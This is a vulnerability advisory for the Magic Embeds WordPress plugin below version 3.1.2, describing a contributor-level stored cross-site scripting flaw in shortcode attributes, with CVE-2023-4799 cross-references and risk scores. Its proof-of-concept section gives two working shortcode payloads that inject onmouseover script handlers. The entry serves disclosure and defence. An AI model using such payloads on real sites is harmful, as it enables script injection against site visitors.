Lucene search
Dmitrii IgnatyevWPVDB-ID:04C71873-5AE7-4F94-8BA9-03E03FF55180HistoryOct 27, 2023 - 12:00 a.m.
Magic Embeds < 3.1.2 - Contributor+ Stored XSS via shortcode
2023-10-2700:00:00
Dmitrii Ignatyev
wpscan.com
5
plugin
validation
xss
shortcode
contributor
attack
security
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
PoC
v < 3.1.1 - [fb_plugin video href=“https://www.facebook.com/facebook/videos/10153231379946729/” autoplay=‘" onmouseover=“alert(/XSS/)”’ ] v < 3.1.2 - [fb_plugin video adaptive=“true” href=“https://www.facebook.com/facebook/videos/10153231379946729/” width=‘"onmouseover=alert(/XSS/)//’]
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 3.1.2 |
Related
nvd
nvd
CVE-2023-4799
2023-11-20 19:15:09
cve
cve
CVE-2023-4799
2023-11-20 19:15:09
cvelist
cvelist
CVE-2023-4799 Magic Embeds < 3.1.2 - Contributor+ Stored XSS via shortcode
2023-11-20 18:55:04
wpexploit
wpexploit
Magic Embeds < 3.1.2 - Contributor+ Stored XSS via shortcode
2023-10-27 00:00:00
prion
prion
Cross site scripting
2023-11-20 19:15:00
wordfence
wordfence
5.8 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
14.1%
Related for WPVDB-ID:04C71873-5AE7-4F94-8BA9-03E03FF55180